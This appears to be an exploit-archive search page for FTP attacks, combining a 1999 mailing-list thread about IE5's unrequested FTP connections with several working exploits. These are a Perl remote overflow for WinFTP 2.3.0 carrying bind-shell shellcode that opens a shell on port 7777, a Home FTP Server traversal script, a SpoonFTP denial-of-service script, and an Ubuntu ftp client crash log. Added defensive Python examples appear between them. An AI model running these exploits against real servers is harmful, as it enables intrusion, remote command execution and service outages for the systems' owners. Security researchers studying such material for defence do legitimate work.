ftp password hacking

Search result for 'ftp password hacking'

/msie.5.typedURL.ftp.address.txt ( na)

Date: Thu, 6 May 1999 12:14:51 -0600
From: Mark <mark@NTSHOP.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Odd Behavior in IE5


Has anyone noticed this?

After you visit an FTP site, IE5 places that URL in the TypedURLs list (just
like it does with Web site addresses,) as seen in the drop down "Address"
list at the top of the screen in IE5 (TypedURLs is the registry key under
HKEY_CURRENT_USER where these entries are stored.) Then if you open a new
instance of IE5 and click on the "Address" drop down list, there is a slight
delay before the list is actually displayed -- and if you watch the network,
there is activity on the network while this delay is taking place.

After putting a sniffer to work to catch this network activity, it appears
that IE5 will actually make a connection to every FTP site listed in the
Address drop down list *before* displaying the Address list -- this is what
causes the delay in displaying the list of TypedURLs in the Address drop
down list.

I haven't the foggiest idea why this needs to occur -- it makes no sense to
me, and certainly places a burden on a given FTP server as well as putting
unnecessary traffic on intranets and the internet -- not to mention any
security logs that track these connections -- plus it causes a significant
delay in displaying the Address list, especially if a FTP site is not
answering...

I wish I'd stuck with IE 4.x - doh.

Mark

-----------------------------------------------------------------------------

Date: Fri, 7 May 1999 08:42:05 -0400
From: Margaret Leber <maggie@VOICENET.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Odd Behavior in IE5

Mark <mark@ntshop.net> wrote:

> Has anyone noticed this?...that IE5 will actually make a connection to every
> FTP site listed in the Address drop down list *before* displaying the Address list --

I'll bet this is related to the behavior noted by Ken Williams
<jkwilli2@csc.ncsu.edu> back in April that IE5 attempts to fetch
favicon.ico from sites when you bookmark them. It sounds like an
outgrowth of the "integrated explorer" philosophy that manifests when
you start treating local filesystem folders like websites (looking for
display text and backgrounds in default "standard" filenames and the
like).

Treating a local folder as if it's a remote server is one thing.
Treating a remote server as if it's a local filesystem is quite another.
It generates unwanted and spurious network traffic, and broadcasts what
a workstation user is up to.

Requests to remote servers are *much* more expensive (to *both* ends of
the conversation) than local filesystem access, and IMHO shouldn't be
happening if the user didn't explicitly ask for them. These behaviors are
startling and counterintuitive. I'm so tired of suddenly having the
lights go off in the kitchen when I flush the toilet, without knowing
why. Somebody in Redmond needs to read "The Psychology of Everyday
Things".

MS seems to think that these kinds of "decommoditizations" are a
value-add. I disagree.

--
 ___________________________________________________________
...../__     __) Margaret Stephanie Leber <maggie@voicenet.com> /
..../(, /|  /|     http://www.voicenet.com/~maggie/maggie.html /
.../   / | / |  _   _   _    `  _"The art of progress consists/
../ ) /  |/  |_(_(_(_/_(_/__(__(/_  of preserving order amid /
./ (_/   '        .-/ .-/     change and change amid order."/
/________________(_/ (_/___________________A.N.Whitehead___/

-----------------------------------------------------------------------------

Date: Fri, 7 May 1999 09:43:01 -0400
From: Glen R. J. Neff <gneff@CW.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Odd Behavior in IE5

I too have noticed some problems with FTP in IE5.  I noticed them in the
betas as well, but I thought they were so blatantly obvious that I didn't
report 'em.

The problems I've observed are with how IE5 handles passive FTP.  They've
been especially apparent to me because my NT boxes at home are behind Linux
IP Masq., which requires passive mode for outgoing FTP, as does our firewall
here at work.

I've always surmised that IE4, which handles it fine, first attempts FTP
connections in non-passive mode, then switches to passive mode if necessary.

In IE5, if you select an FTP link which points directly to a file
(ftp://ftp.acme.com/pub/subdir/file.zip) it will switch to passive mode and
pull the file just fine.  But if you attempt to hit a URL that specifies a
directory on an FTP server (ftp://ftp.acme.com/pub/), after a long pause,
you'll get an error dialogue like:

        An error occurred opening that folder on the FTP Server.
        Make sure you have permission to access that folder.

        Detail:
        200 Type Set to A.
        200 PORT command successful.
        425 Can't build data connection: Operation timed out.

Likewise, here's an example of the output from NT's command line FTP client
which has no support for passive mode:

D:\>ftp ftp.cdrom.com
Connected to wcarchive.cdrom.com.
220 wcarchive.cdrom.com FTP server (Version DG-3.1.27 Wed Dec 2 01:29:08 PST
1998) ready.
User (wcarchive.cdrom.com:(none)): anonymous
331 Guest login ok, send your email address as password.
Password:
230-Welcome to wcarchive - home FTP site for Walnut Creek CDROM.
<snip>
230 Guest login ok, access restrictions apply.
ftp> ls
200 PORT command successful.
425 Can't build data connection: Connection refused.
ftp>

And to really demonstrate my point, here's some sample output from a UN!X
based FTP client:

gneff@jedi-/home/gneff$ ftp ftp.cdrom.com
Connected to wcarchive.cdrom.com.
220 wcarchive.cdrom.com FTP server (Version DG-3.1.27 Wed Dec 2 01:29:08 PST
1998) ready.
Name (ftp.cdrom.com:gneff): anonymous
331 Guest login ok, send your email address as password.
Password:
230-Welcome to wcarchive - home FTP site for Walnut Creek CDROM.
<snip>
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful.
425 Can't build data connection: Connection refused.
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (209,155,82,18,32,226)
150 Opening ASCII mode data connection for 'file list'.
total 91760
-rw-rw-r--  1 root  wheel       696 Nov 19  1997 README
<snip>
drwxrwxr-x  2 root  wheel      2048 May  6 21:26 pub
226 Transfer complete.
ftp>

Can anyone else corroborate the problems with IE5 I've outlined here?

Glen R. J. Neff
NT Administrator
Cable & Wireless Internet Operations Center

"There is no spoon."

-----Original Message-----
From:   Windows NT BugTraq Mailing List
[mailto:NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM] On Behalf Of Mark
Sent:   Thursday, May 06, 1999 14:15
To:     NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject:        Odd Behavior in IE5

Has anyone noticed this?

<snip>

After putting a sniffer to work to catch this network activity, it appears
that IE5 will actually make a connection to every FTP site listed in the
Address drop down list *before* displaying the Address list -- this is what
causes the delay in displaying the list of TypedURLs in the Address drop
down list.

<snip>

I wish I'd stuck with IE 4.x - doh.

Mark
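Glen's two sessions above show the data-connection setup that separates active from passive FTP: the client's PORT command carries its own address and port as six decimal octets, and the server's 227 reply to PASV carries the server's. The Python below is an added example written for this page, not code from any of the posts: it encodes and decodes those two messages and models the try-PORT-then-fall-back-to-PASV order Glen surmises for IE4, against a constructed server stand-in. The regular expression, the function names, `NattedServer` and the `expected_host` check are my own assumptions, not anything the thread states.

```python
import re

# Shape of the reply in the UNIX session above:
#   227 Entering Passive Mode (209,155,82,18,32,226)
PASV_REPLY = re.compile(
    r"^227 .*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)"
)


def parse_pasv_reply(line, expected_host=None):
    """Return (host, port) from a 227 reply, or None if it is malformed.

    If expected_host is given, an advertised address that differs from the
    control connection's peer is refused: a client should not let the server
    steer its data connection to some third machine."""
    m = PASV_REPLY.match(line.strip())
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    if max(h1, h2, h3, h4, p1, p2) > 255:
        return None
    host = "%d.%d.%d.%d" % (h1, h2, h3, h4)
    if expected_host is not None and host != expected_host:
        return None
    return host, p1 * 256 + p2


def build_port_command(host, port):
    """Encode the client's listening socket as a PORT command (active mode);
    'PORT 10,0,0,1,154,119' in the Perl script further down is port 154*256+119."""
    octets = host.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        raise ValueError("not a dotted-quad IPv4 address: %r" % host)
    if not 0 < port < 65536:
        raise ValueError("port out of range: %r" % port)
    return "PORT %s,%d,%d" % (",".join(octets), port // 256, port % 256)


def negotiate_data_connection(send, client_addr, server_host=None):
    """Active first, then passive: the order Glen surmises IE4 uses.

    `send` is a callable taking a command string and returning the server's
    first reply line. Returns ('active', host, port), ('passive', host, port)
    or None when neither mode can be established."""
    host, port = client_addr
    if send(build_port_command(host, port)).startswith("200"):
        if send("LIST").startswith(("125", "150")):
            return ("active", host, port)
    # 425 (or similar) on the data connection: fall back to passive mode.
    endpoint = parse_pasv_reply(send("PASV"), expected_host=server_host)
    if endpoint is None:
        return None
    return ("passive",) + endpoint


class NattedServer:
    """Constructed stand-in for a server reached through NAT: PORT is accepted
    on the control channel, but the data connection back to the client's
    private address cannot be built, exactly as in the sessions above."""

    def __init__(self, host="209.155.82.18"):
        self.host = host
        self.log = []

    def __call__(self, cmd):
        self.log.append(cmd)
        if cmd.startswith("PORT "):
            return "200 PORT command successful."
        if cmd == "LIST":
            return "425 Can't build data connection: Connection refused."
        if cmd == "PASV":
            return "227 Entering Passive Mode (%s,32,226)" % self.host.replace(".", ",")
        return "500 Syntax error, command unrecognized."


if __name__ == "__main__":
    server = NattedServer()
    print(negotiate_data_connection(server, ("10.0.0.1", 39543),
                                    server_host="209.155.82.18"))
    print(server.log)
```

The `expected_host` argument is the client-side hardening point: a 227 reply names whatever address the server chooses, and a client that connects to it unchecked can be pointed at a third machine. Refusing an address that differs from the control connection's peer is the usual defence, and it costs nothing in the NAT scenario Glen describes, where the advertised address is the server's own.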



Microsoft Internet Explorer 5.0 contains even more bugs! MSIE 5.0 improperly utilizes Internet Standard Protocols by repeatedly attempting to connect to all ftp servers that are automatically stored in TypedURLs "Address" dropdown list. MSIE 5.0 also seems to have trouble distinguishing between local file systems and remote servers. Margaret Leber's comments in this advisory are priceless (and funny as heck too)!

Joe Walko/WinFTP 2.4.0 Buffer Overflow ( na)

#!/usr/bin/perl
#
# WinFTP 2.3.0 post-auth remote exploit. (www.wftpserver.com)
#
################################################################################
#                                                                              #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl                        #
#                                                                              #
# Usage: winftp-remote.pl <host> <username> <password> <target>                #
#                                                                              #
# Target: 1 -> Win2k                                                           #
# Target: 2 -> WinXP sp2/3 (DoS only)                                          #
#                                                                              #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl 10.0.0.5 user1 pass1 1 #
#                                                                              #
# [=] Connected.                                                               #
# [=] Sending user user1                                                       #
# [=] Sending pass pass1                                                       #
# [=] Sending payload...                                                       #
# [=] Done. You should have a command shell on port 7777.                      #
#                                                                              #
# root@halcyon:~/Exploits/WinFTP# nc 10.0.0.5 7777                             #
# Microsoft Windows 2000 [Version 5.00.2195]                                   #
# (C) Copyright 1985-1999 Microsoft Corp.                                      #
#                                                                              #
# C:\Program Files\WinFTP Server>                                              #
#                                                                              #
################################################################################
#
# Quick description of the exploit:
#
# There is a post-auth bug in WFTPSRV.exe (2.3.0), in the handling of the LIST
# command.  This appears to be different from the previous vuln found in 
# the handling of the NLIST command.  Providing the server with 
# "LIST *<long string here>" results in an arbitrary memory overwrite 
# vulnerability.  Note that simply giving LIST a long string won't trigger
# the vuln.  At least in my testing, the asterisk was necessary to force 
# WFTPSRV.exe to process the long string, which clobbers various stored 
# addresses, providing an opportunity for an arbitrary DWORD overwrite.
# So exploitation goes like this:
#
# format string vuln -> overflow -> arbitrary memory overwrite -> EIP control
#
# On Win2k, the error is:
# "The instruction at 0x77fc9906 referenced memory at
# 0x88776655. The memory could not be "written".
#
# Which is what we want to see in order to control an arbitrary DWORD.
# At this point our registers look like:
#
#  EAX 010922E0
#  ECX 0275FC14
#  EDX 88776655
#  EBX 00000028
#  ESP 0275F688
#  EBP 0275F81C
#  ESI 00F90000
#  EDI 00F90378
#  EIP 77FC9906 ntdll.77FC9906
#
# Instructions look like:
#
#  77FC98F4   8B48 08          MOV ECX,DWORD PTR DS:[EAX+8]
#  77FC98F7   898D 38FFFFFF    MOV DWORD PTR SS:[EBP-C8],ECX
#  77FC98FD   8B50 0C          MOV EDX,DWORD PTR DS:[EAX+C]
#  77FC9900   8995 34FFFFFF    MOV DWORD PTR SS:[EBP-CC],EDX
#  77FC9906   890A             MOV DWORD PTR DS:[EDX],ECX
#  77FC9908   8951 04          MOV DWORD PTR DS:[ECX+4],EDX
#
# Under normal conditions EDX and ECX contain pointers located
# in the data segment.  However, after exploitation we control 
# EDX (where to write), and ECX (what to write).  From here,
# we load EDX with (almost) any old return address on our stack,
# and ECX with a pointer to our shellcode.
#
# Note: This is *not* a predictable vuln.  I noticed even changing 
# the filename of the binary causes the offsets to change.
# Please experiment on your own.  Let me know if you manage to
# get it working under WinXP SP2.
#          joewalko@gmail.com

use IO::Socket;

# All four arguments are used below; the original only checked for two.
if (@ARGV < 4) {
        print "\nUsage: $0 <host> <username> <password> <target>\n\n";
        print "Target: 1 -> Win2k\n";
        print "Target: 2 -> WinXP sp2/3 (DoS only)\n\n";
        exit;
};

$host           = $ARGV[0];
$username       = $ARGV[1];
$password       = $ARGV[2];
$port           = 21;
$list           = "\x4c\x49\x53\x54\x20\x2a";
$padding        = "\x41" x 272;

$sock = new IO::Socket::INET
        (
                PeerAddr=> "$host",
                PeerPort=> "$port",
                Proto   => 'tcp'
        );

die "Connection failed: $!\n\n" unless $sock;
$user_string    = "user $username\r\n";
$pass_string    = "pass $password\r\n";
$port_string    = "PORT 10,0,0,1,154,119\r\n";  # Source host doesn't matter.


$address2k      = "\x74\xf8\x74\x02".  # <- This needs to contain any
                                       #    readable address, or we
                                       #    immediately cause an exception.

                  "\x14\xfc\x75\x02".  # <- This will become EIP. It points
                                       #    to our shellcode.

                  "\x74\xf8\x75\x02";  # <- This specifies what DWORD to overwrite.
                                       #    YMMV here. I picked an arbitrary
                                       #    return address on the stack located
                                       #    near where ESP was during
                                       #    the exception.  On my system this
                                       #    is:
                                       #
                                       #    0275F874   73D34154  RETURN to MFC42.73D34154
$nopsled        = "\x90" x 2228;


# Metasploit win32_bind, EXITFUNC=process LPORT=7777
$shellcode      =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x10".
"\x92\xe9\xd3\x83\xeb\xfc\xe2\xf4\xec\xf8\x02\x9e\xf8\x6b\x16\x2c".
"\xef\xf2\x62\xbf\x34\xb6\x62\x96\x2c\x19\x95\xd6\x68\x93\x06\x58".
"\x5f\x8a\x62\x8c\x30\x93\x02\x9a\x9b\xa6\x62\xd2\xfe\xa3\x29\x4a".
"\xbc\x16\x29\xa7\x17\x53\x23\xde\x11\x50\x02\x27\x2b\xc6\xcd\xfb".
"\x65\x77\x62\x8c\x34\x93\x02\xb5\x9b\x9e\xa2\x58\x4f\x8e\xe8\x38".
"\x13\xbe\x62\x5a\x7c\xb6\xf5\xb2\xd3\xa3\x32\xb7\x9b\xd1\xd9\x58".
"\x50\x9e\x62\xa3\x0c\x3f\x62\x93\x18\xcc\x81\x5d\x5e\x9c\x05\x83".
"\xef\x44\x8f\x80\x76\xfa\xda\xe1\x78\xe5\x9a\xe1\x4f\xc6\x16\x03".
"\x78\x59\x04\x2f\x2b\xc2\x16\x05\x4f\x1b\x0c\xb5\x91\x7f\xe1\xd1".
"\x45\xf8\xeb\x2c\xc0\xfa\x30\xda\xe5\x3f\xbe\x2c\xc6\xc1\xba\x80".
"\x43\xc1\xaa\x80\x53\xc1\x16\x03\x76\xfa\xf7\xb2\x76\xc1\x60\x32".
"\x85\xfa\x4d\xc9\x60\x55\xbe\x2c\xc6\xf8\xf9\x82\x45\x6d\x39\xbb".
"\xb4\x3f\xc7\x3a\x47\x6d\x3f\x80\x45\x6d\x39\xbb\xf5\xdb\x6f\x9a".
"\x47\x6d\x3f\x83\x44\xc6\xbc\x2c\xc0\x01\x81\x34\x69\x54\x90\x84".
"\xef\x44\xbc\x2c\xc0\xf4\x83\xb7\x76\xfa\x8a\xbe\x99\x77\x83\x83".
"\x49\xbb\x25\x5a\xf7\xf8\xad\x5a\xf2\xa3\x29\x20\xba\x6c\xab\xfe".
"\xee\xd0\xc5\x40\x9d\xe8\xd1\x78\xbb\x39\x81\xa1\xee\x21\xff\x2c".
"\x65\xd6\x16\x05\x4b\xc5\xbb\x82\x41\xc3\x83\xd2\x41\xc3\xbc\x82".
"\xef\x42\x81\x7e\xc9\x97\x27\x80\xef\x44\x83\x2c\xef\xa5\x16\x03".
"\x9b\xc5\x15\x50\xd4\xf6\x16\x05\x42\x6d\x39\xbb\xe0\x18\xed\x8c".
"\x43\x6d\x3f\x2c\xc0\x92\xe9\xd3\x0d\x0a";


if ($ARGV[3] == '1')
{
        $payload = $list.$padding.$address2k.$nopsled.$shellcode;
}

elsif ($ARGV[3] == '2')
{
        $payload = $list.$padding.$address2k.$nopsled.$shellcode;
}

else
{
  $payload = $list.$padding.$address2k.$nopsled.$shellcode;
}


print "\n[=] Connected.\n";
sleep 1;

print "[=] Sending $user_string";
$sock->send($user_string);
sleep 1;

print "[=] Sending $pass_string";
$sock->send($pass_string);
sleep 1;

$sock->send($port_string);
sleep 1;

print "[=] Sending payload...\n";
$sock->send($payload);
sleep 1;


if ($ARGV[3] == '1')
{
  print "[=] Done. You should have a command shell on port 7777.\n\n";
}

elsif ($ARGV[3] == '2')
{
  print "[=] Done. WinFTP should be crashed on the remote host.\n\n";
}

else
{
  print "[=] Done.\n\n";
}



WinFTP version 2.3.0 post authentication remote buffer overflow exploit that spawns a shell on port 7777.

zhangmc/Home FTP Server 'MKD' Command Directory Traversal Vulnerability ( windows)

#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage:  ./expl.py <serv_ip>      <Username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")

if len(sys.argv) != 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    sock.send("MKD ../A\r\n")
    sock.close()
    sys.exit(0)


C4SS!0 G0M3S/SpoonFTP 1.2 Denial Of Service ( na)

#!/usr/bin/python
#
#
#[+]Exploit Title: Exploit Denial of Service SpoonFTP 1.2
#[+]Date: 03\18\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.softpedia.com/progDownload/SpoonFTP-Download-49969.html
#[+]Version: 1.2
#[+]Tested On: WIN-XP SP3 Portuguese Brazil
#[+]CVE: N/A
#
#
#       xxx     xxx        xxxxxxxxxxx        xxxxxxxxxxx        xxxxxxxxxxx
#        xxx   xxx        xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx 
#         xxx xxx         xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx                   
#          xxxxx          xxx       xxx      xxx       xxx      xxx       xxx           xxxxxx  
#           xxx           xxx       xxx      xxx       xxx      xxx       xxx          xxxxxxxx  xxxxxxxx  xxxxxxxxx
#         xxxxxx          xxx       xxx      xxx       xxx      xxx       xxx          xx    xx  xx    xx  xx
#        xxx  xxx         xxx       xxx      xxx       xxx      xxx       xxx          xx    xx  xx xxxx   xx  xxxxx
#      xxx     xxx        xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx   xxx    xxxxxxxx  xx   xx   xx     xx
#     xxx       xxx        xxxxxxxxxxx        xxxxxxxxxxx        xxxxxxxxxxx    xxx     xxxxxx   xx    xx  xxxxxxxxx
#
# Created by C4SS!0 G0M3S
#E-mail Louredo_@hotmail.com
#Site www.exploit-br.org
#
#



from socket import *
import os
import sys
from time import sleep

if os.name == 'nt':
     os.system("cls")
     os.system("color 4f")
else:
     os.system("clear")


def usage():
     print """

          ===================================================
          ===================================================
          ==========Exploit Denial of Service SpoonFTP=======
          ==========Autor C4SS!0 G0M3S=======================
          ==========E-mail Louredo_@hotmail.com==============
          ==========Site www.exploit-br.org==================
          ===================================================
          ===================================================

"""

if len(sys.argv) !=5:
     usage()
     print "\t\t[-]Usage: %s <Host> <Port> <User> <Pass>" % sys.argv[0]
     print "\t\t[-]Exemple: %s 192.168.1.2 21 admin pass" % sys.argv[0]
     sys.exit(0)

host = sys.argv[1]
porta = int(sys.argv[2])
user = sys.argv[3]
pasw = sys.argv[4]

exploit = "/\\" * (6000/3)
usage()
print "\t\t[+]Connecting to Server "+host+"...\n"
sleep(1)
s = socket(AF_INET,SOCK_STREAM)
try:
     s.connect((host,porta))
     print "\t\t[+]Checking if server is vulnerable\n"
     sleep(1)
     banner = s.recv(2000)
     if banner.find("SpoonFTP V1.2") == -1:
          print "\t\t[+]I'm sorry, server is not vulnerable:(\n"
          sleep(1)
          sys.exit(0x00)
     print "\t\t[+]Making Loging On Server\n"
     sleep(1)
     s.send("USER "+user+"\r\n")
     s.recv(200)
     s.send("PASS "+pasw+"\r\n")
     check = s.recv(2000)
     if check.find("230") == -1:
          print "\t\t[+]Error on Login, Check Your Username or Password\n"
          sleep(1)
          sys.exit(0)
     print "\t\t[+]Sending Exploit...\n"
     sleep(1)
     s.send("RETR "+exploit+"\r\n")
     s.close()
     print "\t\t[+]Submitted Exploit Success\n"
     sleep(1)

     print "\t\t[+]Checking if the exploit works\n"
     sleep(1)
     try:
          # Reconnect on a fresh socket; the original reused the closed `s`,
          # which always raised and so always reported success.
          so = socket(AF_INET,SOCK_STREAM)
          so.connect((host,porta))
          print "\t\t[+]I'm Sorry, But Not Worked Exploit:(\n"
          sleep(1)
     except Exception:
          print "\t\t[+]Congratulations, worked with the Exploit Success:)\n"
          sleep(1)


except Exception:  # a bare except would also swallow the sys.exit() calls above
     print "\t\t[+]Error connecting to Server\n"
     sleep(1)


SpoonFTP version 1.2 remote denial of service exploit.
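The Home FTP Server entry above sends `MKD ../A`, the SpoonFTP entry sends a 4,000-byte RETR argument, and the WinFTP script earlier sends a LIST argument of a few thousand bytes. All three are the same class of server-side failure: a command argument reaches a handler without a length cap, or the resulting path is not confined to the FTP root. The Python below is an added example written for this page, not code from any of the exploits or products listed: a minimal request validator with the two checks a server should run before acting. `MAX_ARG_LEN`, the verb set, the root `/srv/ftp` and `SAMPLE_REQUESTS` are all constructed; the LIST sample uses a 2,500-byte filler rather than the real payload.

```python
import os

MAX_ARG_LEN = 512          # constructed limit; size it to your longest legitimate path
PATH_VERBS = {"MKD", "RMD", "CWD", "RETR", "STOR", "DELE", "LIST", "NLST", "SIZE"}


class FtpCommandError(Exception):
    """Carries the 3-digit reply the server should send instead of acting."""


def parse_command(line):
    """Split one control-channel line into (VERB, argument).

    Rejects oversized arguments up front, before any handler copies them
    into a fixed buffer (the failure mode behind the RETR and LIST crashes)."""
    if not line.endswith("\r\n"):
        raise FtpCommandError("501 Line not CRLF terminated.")
    body = line[:-2]
    if any(c in body for c in "\r\n\0"):
        raise FtpCommandError("501 Illegal character in command.")
    verb, _, arg = body.partition(" ")
    verb = verb.upper()
    if not (verb.isalpha() and 3 <= len(verb) <= 4):
        raise FtpCommandError("500 Syntax error, command unrecognized.")
    if len(arg) > MAX_ARG_LEN:
        raise FtpCommandError("501 Argument too long.")
    return verb, arg


def resolve_path(root, cwd, arg):
    """Map a client path onto the real filesystem, confined under `root`.

    `cwd` is the session's virtual working directory (always starts with '/').
    A '..' that would climb above the virtual root is refused rather than
    silently clamped, so 'MKD ../A' from '/' is an error, while 'pub/../A'
    (which stays inside the root) is allowed."""
    # Windows servers must treat backslash as a separator too, or
    # '..\\A' slips past a check that only knows about '../'.
    virtual = arg.replace("\\", "/")
    if not virtual.startswith("/"):
        virtual = cwd.rstrip("/") + "/" + virtual
    parts = []
    for comp in virtual.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise FtpCommandError("550 Path escapes the FTP root.")
            parts.pop()
        else:
            parts.append(comp)
    real = os.path.join(root, *parts)
    # Second, OS-level check: the absolute result must still sit under root.
    root_abs = os.path.abspath(root)
    if os.path.commonpath([root_abs, os.path.abspath(real)]) != root_abs:
        raise FtpCommandError("550 Path escapes the FTP root.")
    return real


def triage(root, cwd, lines):
    """Run each raw request line through both checks; returns a list of
    (verb, 'ok'|'rejected', resolved path or reply) tuples."""
    results = []
    for line in lines:
        try:
            verb, arg = parse_command(line)
            path = resolve_path(root, cwd, arg) if verb in PATH_VERBS else None
            results.append((verb, "ok", path))
        except FtpCommandError as err:
            results.append((line.split(" ", 1)[0].strip(), "rejected", str(err)))
    return results


# Constructed requests mirroring the payloads on this page.
SAMPLE_REQUESTS = [
    "MKD ../A\r\n",                    # Home FTP Server traversal
    "RETR " + "/\\" * 2000 + "\r\n",   # SpoonFTP: 4,000-byte argument
    "LIST *" + "A" * 2500 + "\r\n",    # WinFTP-style oversized LIST argument
    "MKD pub/incoming\r\n",            # legitimate request
]

if __name__ == "__main__":
    for verb, status, detail in triage("/srv/ftp", "/", SAMPLE_REQUESTS):
        print("%-4s %-8s %s" % (verb, status, str(detail)[:60]))
```

The second check in `resolve_path` uses `os.path.abspath` so the example runs without a real directory tree; a production server should resolve symlinks (`os.path.realpath`) before comparing, since a link inside the root can still point outside it. The length cap is deliberately applied to the raw line before any parsing of the argument, which is the only place it protects handlers that were never written with a bound in mind.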

localh0t/Ubuntu 11.04 FTP Client Buffer Overflow ( na)

The Ubuntu 11 (and earlier) ftp client seems to crash when a large argument is passed to the "account" command while connected to any ftp server. Example:

Ubuntu 11.04 x86:
=================

(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.9 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x50)[0x27fdf0]
/lib/i386-linux-gnu/libc.so.6(+0xe4cca)[0x27ecca]
/lib/i386-linux-gnu/libc.so.6(+0xe41ed)[0x27e1ed]
/usr/bin/ftp[0x804b5e2]
/usr/bin/ftp[0x8055ead]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xe7)[0x1b0e37]
/usr/bin/ftp[0x8049d61]
======= Memory map: ========
00110000-0012c000 r-xp 00000000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012c000-0012d000 r--p 0001b000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012d000-0012e000 rw-p 0001c000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012e000-0012f000 r-xp 00000000 00:00 0          [vdso]
0012f000-0015d000 r-xp 00000000 08:01 524378     /lib/libreadline.so.6.2
0015d000-0015e000 r--p 0002e000 08:01 524378     /lib/libreadline.so.6.2
0015e000-00161000 rw-p 0002f000 08:01 524378     /lib/libreadline.so.6.2
00161000-00162000 rw-p 00000000 00:00 0
00162000-00196000 r-xp 00000000 08:01 524347     /lib/libncurses.so.5.7
00196000-00197000 ---p 00034000 08:01 524347     /lib/libncurses.so.5.7
00197000-00199000 r--p 00034000 08:01 524347     /lib/libncurses.so.5.7
00199000-0019a000 rw-p 00036000 08:01 524347     /lib/libncurses.so.5.7
0019a000-002f4000 r-xp 00000000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f4000-002f5000 ---p 0015a000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f5000-002f7000 r--p 0015a000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f7000-002f8000 rw-p 0015c000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f8000-002fb000 rw-p 00000000 00:00 0
002fb000-002fd000 r-xp 00000000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002fd000-002fe000 r--p 00001000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002fe000-002ff000 rw-p 00002000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002ff000-00309000 r-xp 00000000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
00309000-0030a000 r--p 00009000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
0030a000-0030b000 rw-p 0000a000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
0030b000-00311000 r-xp 00000000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00311000-00312000 r--p 00005000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00312000-00313000 rw-p 00006000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00313000-00326000 r-xp 00000000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00326000-00327000 r--p 00012000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00327000-00328000 rw-p 00013000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00328000-0032a000 rw-p 00000000 00:00 0
0032a000-00333000 r-xp 00000000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00333000-00334000 r--p 00008000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00334000-00335000 rw-p 00009000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00335000-0034f000 r-xp 00000000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
0034f000-00350000 r--p 00019000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
00350000-00351000 rw-p 0001a000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
08048000-08059000 r-xp 00000000 08:01 1573707    /usr/bin/netkit-ftp
